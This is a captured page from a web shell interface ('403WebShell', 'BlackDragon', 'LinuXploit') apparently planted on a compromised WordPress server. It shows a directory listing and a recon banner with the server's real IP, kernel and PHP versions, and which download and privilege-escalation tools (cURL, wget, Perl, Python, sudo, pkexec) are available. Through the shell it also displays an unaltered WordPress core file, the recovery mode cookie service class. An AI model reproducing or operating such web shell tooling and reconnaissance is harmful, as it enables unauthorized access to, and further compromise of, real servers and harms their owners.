buyer kontol nego ga ngotak
comecondo.com
Name
Type
Size
Owner/Group
Permission
Last Modified
Actions
dir
-
gavin/www-data
drwxr-sr-x
2024-12-15 11:41:30
dir
-
root/root
drwxr-xr-x
2019-08-25 02:29:45
dir
-
root/www-data
drwxr-sr-x
2024-05-24 05:31:33
dir
-
gavin/www-data
drwxrwsr-x
2026-05-23 05:31:31
dir
-
gavin/www-data
drwxrwsr-x
2026-05-23 05:31:31
dir
-
gavin/www-data
drwxr-sr-x
2025-08-29 03:10:31
dir
-
gavin/www-data
drwxrwsr-x
2026-05-23 05:31:31
dir
-
gavin/www-data
drwxr-sr-x
2021-06-27 11:01:30
text/plain
201 B
root/www-data
-rw-r--r--
2021-06-24 04:05:20
image/jpeg
22.78 KB
gavin/www-data
-rw-rw-r--
2022-01-31 05:13:10
image/png
268 B
gavin/www-data
-rw-rw-r--
2021-01-11 04:23:00
text/html
11.06 KB
gavin/www-data
-rw-r--r--
2019-08-25 02:29:47
text/x-php
420 B
gavin/www-data
-rw-r--r--
2017-11-30 11:11:00
text/plain
19.47 KB
gavin/www-data
-rw-r--r--
2019-01-01 08:37:49
text/html
1012 B
gavin/www-data
-rw-rw-r--
2021-01-01 03:50:38
image/png
309 B
gavin/www-data
-rw-rw-r--
2021-01-11 04:38:33
image/png
499 B
gavin/www-data
-rw-rw-r--
2021-01-11 04:40:01
image/png
28.16 KB
gavin/www-data
-rw-rw-r--
2022-01-27 09:10:36
image/png
12.71 KB
gavin/www-data
-rw-rw-r--
2022-01-27 09:23:52
image/png
1.36 KB
gavin/www-data
-rw-rw-r--
2022-01-30 09:18:10
image/png
2.49 KB
gavin/www-data
-rw-rw-r--
2022-01-30 09:20:50
text/html
7.27 KB
gavin/www-data
-rw-r--r--
2019-04-08 10:59:56
image/jpeg
58.99 KB
gavin/www-data
-rw-rw-r--
2022-01-29 05:15:06
image/jpeg
788.8 KB
gavin/www-data
-rw-rw-r--
2022-02-01 11:27:14
text/x-php
6.76 KB
gavin/www-data
-rw-r--r--
2019-01-12 06:41:52
text/x-php
369 B
gavin/www-data
-rw-r--r--
2017-11-30 11:11:00
text/x-php
2.23 KB
gavin/www-data
-rw-r--r--
2019-01-21 01:34:51
text/x-php
2.83 KB
gavin/www-data
-rw-r--r--
2020-10-24 04:07:41
text/x-php
3.62 KB
gavin/www-data
-rw-r--r--
2022-04-20 01:23:49
text/x-php
3.76 KB
gavin/www-data
-rw-r--r--
2019-01-09 08:37:51
text/x-php
2.44 KB
gavin/www-data
-rw-r--r--
2019-01-16 05:29:49
text/x-php
3.23 KB
gavin/www-data
-rw-r--r--
2017-11-30 11:11:00
text/x-php
38.62 KB
gavin/www-data
-rw-r--r--
2019-06-10 01:34:45
text/x-php
8.21 KB
gavin/www-data
-rw-r--r--
2017-11-30 11:11:00
text/x-php
18.52 KB
gavin/www-data
-rw-r--r--
2019-03-28 07:04:51
text/x-php
30.36 KB
gavin/www-data
-rw-r--r--
2019-01-16 04:51:52
text/x-php
4.65 KB
gavin/www-data
-rw-r--r--
2017-11-30 11:11:00
text/x-php
3 KB
gavin/www-data
-rw-r--r--
2018-08-17 01:51:36
© BlackDragon
403WebShell 403Webshell
Server IP : 68.183.124.220 / Your IP : 216.73.216.228 Apache/2.4.18 (Ubuntu) Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 gavin ( 1000 )7.0.33-0ubuntu0.16.04.16 pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON / var /www /html /wp-includes /
[ Back ] Current File : /var/www/html/wp-includes/class-wp-recovery-mode-cookie-service.php <?php
/**
* Error Protection API: WP_Recovery_Mode_Cookie_Service class
*
* @package WordPress
* @since 5.2.0
*/
/**
* Core class used to set, validate, and clear cookies that identify a Recovery Mode session.
*
* @since 5.2.0
*/
final class WP_Recovery_Mode_Cookie_Service {
/**
* Checks whether the recovery mode cookie is set.
*
* @since 5.2.0
*
* @return bool True if the cookie is set, false otherwise.
*/
public function is_cookie_set() {
return ! empty( $_COOKIE[ RECOVERY_MODE_COOKIE ] );
}
/**
* Sets the recovery mode cookie.
*
* This must be immediately followed by exiting the request.
*
* @since 5.2.0
*/
public function set_cookie() {
$value = $this->generate_cookie();
setcookie( RECOVERY_MODE_COOKIE, $value, 0, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true );
if ( COOKIEPATH !== SITECOOKIEPATH ) {
setcookie( RECOVERY_MODE_COOKIE, $value, 0, SITECOOKIEPATH, COOKIE_DOMAIN, is_ssl(), true );
}
}
/**
* Clears the recovery mode cookie.
*
* @since 5.2.0
*/
public function clear_cookie() {
setcookie( RECOVERY_MODE_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN );
setcookie( RECOVERY_MODE_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
}
/**
* Validates the recovery mode cookie.
*
* @since 5.2.0
*
* @param string $cookie Optionally specify the cookie string.
* If omitted, it will be retrieved from the super global.
* @return true|WP_Error True on success, error object on failure.
*/
public function validate_cookie( $cookie = '' ) {
if ( ! $cookie ) {
if ( empty( $_COOKIE[ RECOVERY_MODE_COOKIE ] ) ) {
return new WP_Error( 'no_cookie', __( 'No cookie present.' ) );
}
$cookie = $_COOKIE[ RECOVERY_MODE_COOKIE ];
}
$parts = $this->parse_cookie( $cookie );
if ( is_wp_error( $parts ) ) {
return $parts;
}
list( , $created_at, $random, $signature ) = $parts;
if ( ! ctype_digit( $created_at ) ) {
return new WP_Error( 'invalid_created_at', __( 'Invalid cookie format.' ) );
}
/**
* Filter the length of time a Recovery Mode cookie is valid for.
*
* @since 5.2.0
*
* @param int $length Length in seconds.
*/
$length = apply_filters( 'recovery_mode_cookie_length', WEEK_IN_SECONDS );
if ( time() > $created_at + $length ) {
return new WP_Error( 'expired', __( 'Cookie expired.' ) );
}
$to_sign = sprintf( 'recovery_mode|%s|%s', $created_at, $random );
$hashed = $this->recovery_mode_hash( $to_sign );
if ( ! hash_equals( $signature, $hashed ) ) {
return new WP_Error( 'signature_mismatch', __( 'Invalid cookie.' ) );
}
return true;
}
/**
* Gets the session identifier from the cookie.
*
* The cookie should be validated before calling this API.
*
* @since 5.2.0
*
* @param string $cookie Optionally specify the cookie string.
* If omitted, it will be retrieved from the super global.
* @return string|WP_Error Session ID on success, or error object on failure.
*/
public function get_session_id_from_cookie( $cookie = '' ) {
if ( ! $cookie ) {
if ( empty( $_COOKIE[ RECOVERY_MODE_COOKIE ] ) ) {
return new WP_Error( 'no_cookie', __( 'No cookie present.' ) );
}
$cookie = $_COOKIE[ RECOVERY_MODE_COOKIE ];
}
$parts = $this->parse_cookie( $cookie );
if ( is_wp_error( $parts ) ) {
return $parts;
}
list( , , $random ) = $parts;
return sha1( $random );
}
/**
* Parses the cookie into its four parts.
*
* @since 5.2.0
*
* @param string $cookie Cookie content.
* @return array|WP_Error Cookie parts array, or error object on failure.
*/
private function parse_cookie( $cookie ) {
$cookie = base64_decode( $cookie );
$parts = explode( '|', $cookie );
if ( 4 !== count( $parts ) ) {
return new WP_Error( 'invalid_format', __( 'Invalid cookie format.' ) );
}
return $parts;
}
/**
* Generates the recovery mode cookie value.
*
* The cookie is a base64 encoded string with the following format:
*
* recovery_mode|iat|rand|signature
*
* Where "recovery_mode" is a constant string,
* iat is the time the cookie was generated at,
* rand is a randomly generated password that is also used as a session identifier
* and signature is an hmac of the preceding 3 parts.
*
* @since 5.2.0
*
* @return string Generated cookie content.
*/
private function generate_cookie() {
$to_sign = sprintf( 'recovery_mode|%s|%s', time(), wp_generate_password( 20, false ) );
$signed = $this->recovery_mode_hash( $to_sign );
return base64_encode( sprintf( '%s|%s', $to_sign, $signed ) );
}
/**
* Gets a form of `wp_hash()` specific to Recovery Mode.
*
* We cannot use `wp_hash()` because it is defined in `pluggable.php` which is not loaded until after plugins are loaded,
* which is too late to verify the recovery mode cookie.
*
* This tries to use the `AUTH` salts first, but if they aren't valid specific salts will be generated and stored.
*
* @since 5.2.0
*
* @param string $data Data to hash.
* @return string|false The hashed $data, or false on failure.
*/
private function recovery_mode_hash( $data ) {
if ( ! defined( 'AUTH_KEY' ) || AUTH_KEY === 'put your unique phrase here' ) {
$auth_key = get_site_option( 'recovery_mode_auth_key' );
if ( ! $auth_key ) {
if ( ! function_exists( 'wp_generate_password' ) ) {
require_once ABSPATH . WPINC . '/pluggable.php';
}
$auth_key = wp_generate_password( 64, true, true );
update_site_option( 'recovery_mode_auth_key', $auth_key );
}
} else {
$auth_key = AUTH_KEY;
}
if ( ! defined( 'AUTH_SALT' ) || AUTH_SALT === 'put your unique phrase here' || AUTH_SALT === $auth_key ) {
$auth_salt = get_site_option( 'recovery_mode_auth_salt' );
if ( ! $auth_salt ) {
if ( ! function_exists( 'wp_generate_password' ) ) {
require_once ABSPATH . WPINC . '/pluggable.php';
}
$auth_salt = wp_generate_password( 64, true, true );
update_site_option( 'recovery_mode_auth_salt', $auth_salt );
}
} else {
$auth_salt = AUTH_SALT;
}
$secret = $auth_key . $auth_salt;
return hash_hmac( 'sha1', $data, $secret );
}
}
LinuXploit 
